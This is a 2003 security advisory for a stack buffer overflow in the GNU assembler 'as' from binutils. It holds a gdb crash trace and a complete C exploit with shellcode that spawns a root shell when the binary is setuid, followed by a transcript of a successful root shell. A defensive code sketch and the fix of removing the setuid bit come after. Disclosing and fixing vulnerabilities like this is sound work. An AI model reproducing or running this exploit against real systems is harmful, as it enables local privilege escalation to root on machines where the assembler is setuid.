-------------------------------------------------
No System Group - Advisory #01 - 19/08/03
-------------------------------------------------

Program: as - The GNU assembler
Homepage: http://sources.redhat.com/binutils/
Vulnerable Versions: GNU binutils 2.14 and prior
Risk: Low / Medium
Impact: Stack Buffer Overflow

-------------------------------------------------
- DESCRIPTION
-------------------------------------------------

The GNU Binutils are a collection of binary tools. 'as' is the GNU assembler.
More information at: http://sources.redhat.com/binutils/

-------------------------------------------------
- DETAILS
-------------------------------------------------

Passing a 2005-byte file name as the argument crashes the assembler:

$ /usr/bin/as `perl -e 'print "A" x 2005'`
Segmentation fault

Now we proceed to open gdb to view what may have occurred.

$ gdb /usr/bin/as
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA... ..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp            0x41414141       0x41414141
eip            0x41414141       0x41414141
esp            0xbffff090       0xbffff090
(gdb)

Here, as you can see, we are able to overwrite the return address: both ebp
and eip now hold the 0x41 ('A') bytes taken from the file name.
Return : 0xbffff090

-------------------------------------------------
- EXPLOIT
-------------------------------------------------

I have done minimal testing on this.
It has been tested on Slackware 9.0 and Red Hat 7.2.

------------------- as_exp.c --------------------
/*
 * Linux 'as' buffer overflow
 *
 * This will give you a root shell if /usr/bin/as is SUID,
 * which isn't by default.
 *
 * Use: ./as_exp [offset]
 * Try offsets 300-400
 *
 * Tested on Slackware 9.0 and Red Hat 7.2
 *
 * by CoKi
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET 350

long esp(void);

int main(int argc, char *argv[])
{
    /* one extra byte so the argument passed to execlp is NUL-terminated */
    char buf[2005 + 1];
    char shellcode[]=
        "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
        "\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int i, off;
    long ret;

    if(argc>1) {
        off = atoi(argv[1]);
    } else off = OFFSET;

    /* guessed return address: current stack pointer minus the offset */
    ret = (esp() - off);

    printf("\n'as' buffer overflow by CoKi\n");
    printf("----------------------------\n\n");
    printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);

    /* NOP sled over the whole buffer (4 bytes at a time, staying in bounds) */
    for(i=0;i<2004;i+=4)
        *(unsigned long *)&buf[i]=0x90909090;

    /* the two last words land on the saved ebp and the return address */
    *(unsigned long *)&buf[2005 - 4]=ret;
    *(unsigned long *)&buf[2005 - 8]=ret;

    /* shellcode sits just below the overwritten return address */
    memcpy(buf + 2005 - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    buf[2005] = '\0';

    execlp("/usr/bin/as","as",buf,(char *)NULL);
    return 1;
}

/* i386 only: return the current stack pointer in eax */
long esp(void){
    __asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------

$ gcc -o as_exp as_exp.c
$ ./as_exp 390

'as' buffer overflow by CoKi
----------------------------

Return Address: 0xbffff002
Offset: 390

Assembler messages:
Error: can't open ............ .................../bin/sh ..... for reading
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#

This will give you a root shell if /usr/bin/as is SUID, which isn't by default.
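To show the bug class at source level from the defender's side, the following is an added illustration and not binutils' code: the assumed pattern (a file name copied unchecked into a fixed stack buffer; NAME_MAX_LEN and the function names are hypothetical) beside a bounded version that rejects an over-long name, such as the 2005-byte one above, before it ever reaches the stack buffer.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX_LEN 256   /* assumed size of the fixed stack buffer */

/* Unsafe pattern (the defect): an argv string of any length is copied into a
 * fixed stack buffer. A name longer than NAME_MAX_LEN runs past the buffer
 * into the saved ebp/eip, which is how "A" x 2005 produced eip=0x41414141. */
int open_for_reading_unsafe(const char *name)
{
    char path[NAME_MAX_LEN];
    strcpy(path, name);                 /* no bound check */
    FILE *f = fopen(path, "r");
    if (f == NULL) return 0;
    fclose(f);
    return 1;
}

/* Hardened form: refuse a name that cannot fit, then copy with a bound.
 * Returns 1 if the file opened, 0 if it could not be opened, -1 if the
 * name was rejected as too long (errno set to ENAMETOOLONG). */
int open_for_reading_safe(const char *name)
{
    char path[NAME_MAX_LEN];
    size_t len = strlen(name);
    if (len >= sizeof path) {           /* keep room for the terminator */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(path, name, len + 1);
    FILE *f = fopen(path, "r");
    if (f == NULL) return 0;
    fclose(f);
    return 1;
}

/* Builds a constructed name of n 'A' bytes (the advisory's test input) and
 * feeds it to the hardened routine, so the length check can be exercised. */
int probe_name_length(size_t n)
{
    char *name = malloc(n + 1);
    if (name == NULL) return -2;
    memset(name, 'A', n);
    name[n] = '\0';
    int rc = open_for_reading_safe(name);
    free(name);
    return rc;
}
```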
-------------------------------------------------
- SOLUTIONS
-------------------------------------------------

Remove the setuid bit from the program if it is set:

# chmod u-s /usr/bin/as

-------------------------------------------------
- REFERENCES
-------------------------------------------------

http://www.nosystem.com.ar/advisories/advisory-01.txt

-------------------------------------------------
- CREDITS
-------------------------------------------------

Discovered by CoKi
No System Group - http://www.nosystem.com.ar